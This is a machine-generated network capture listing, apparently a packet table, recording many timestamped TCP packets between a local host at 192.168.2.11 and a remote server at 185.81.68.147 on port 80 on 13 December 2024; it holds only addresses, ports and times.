                                                                                                                                                                                                Dec 13, 2024 08:18:56.955809116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955826044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955842972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955859900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955877066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955910921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955962896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956087112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956104040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956134081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956463099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956479073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956495047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956517935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956541061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956613064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956634045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956650972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956670046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956672907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956707001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956916094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956933022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956948042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.956969976 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957369089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957420111 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957536936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957554102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957592964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957705021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957729101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957745075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957760096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957771063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957777977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957798004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957798004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957817078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.957833052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958250999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958316088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958343029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958359003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958405972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958491087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958511114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958528996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958547115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958554029 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.958605051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959259033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959275961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959294081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959326029 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959825039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959842920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959861994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959877014 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959897995 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.959983110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960000038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960016012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960032940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960036039 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960066080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960148096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960170031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960187912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960206985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960586071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.960659981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972040892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972219944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972237110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972265005 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972384930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972402096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972417116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972429037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972434044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972455025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972457886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972496986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972678900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972697973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972713947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972729921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972740889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972764015 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.972840071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.973117113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.973170996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144010067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144051075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144078970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144095898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144113064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144115925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144129992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144148111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144155979 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144200087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144215107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144227982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144242048 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144244909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144283056 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144438982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144455910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144471884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144499063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144597054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144614935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144632101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144639969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144680977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.144999981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145066023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145081043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145097017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145107031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145122051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145137072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145138979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145157099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145179987 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145308018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145349026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145365000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145380974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145440102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.145931959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146004915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146019936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146047115 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146146059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146189928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146198988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146224976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146243095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146267891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146399975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146418095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146445036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146472931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146527052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146804094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146872044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146888018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.146912098 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147023916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147041082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147057056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147070885 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147072077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147090912 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147252083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147269011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147284985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147295952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147331953 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147788048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147872925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147888899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.147917986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148034096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148051977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148067951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148077011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148086071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148103952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148257017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148272991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148288965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148297071 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148346901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148720980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148781061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148797989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148823977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148940086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148958921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148974895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.148993969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149019003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149101019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149127960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149143934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149161100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149168015 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149208069 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149682999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149740934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149756908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149785042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149876118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149892092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149915934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149918079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149935961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.149959087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150110960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150137901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150154114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150154114 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150199890 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150686026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150713921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150732994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150754929 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150911093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150937080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150954962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.150980949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151000023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151021957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151232004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151248932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151269913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151302099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151351929 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151782036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151839018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151859999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151875973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151963949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151981115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.151995897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.152013063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.152018070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.152040005 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.152154922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.152204990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164267063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164298058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164313078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164347887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164458990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164475918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164491892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164506912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164506912 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164537907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164702892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164720058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164736032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164752007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164788961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164887905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164904118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164920092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164936066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164944887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.164982080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336227894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336288929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336303949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336342096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336350918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336379051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336390018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336395979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336432934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336549044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336572886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336587906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336605072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336612940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336807013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336823940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336847067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336888075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336954117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336982965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.336996078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337090969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337125063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337198019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337219954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337335110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337349892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337367058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337385893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337443113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337611914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337678909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.337694883 CET8049726185.81.68.147192.168.2.11
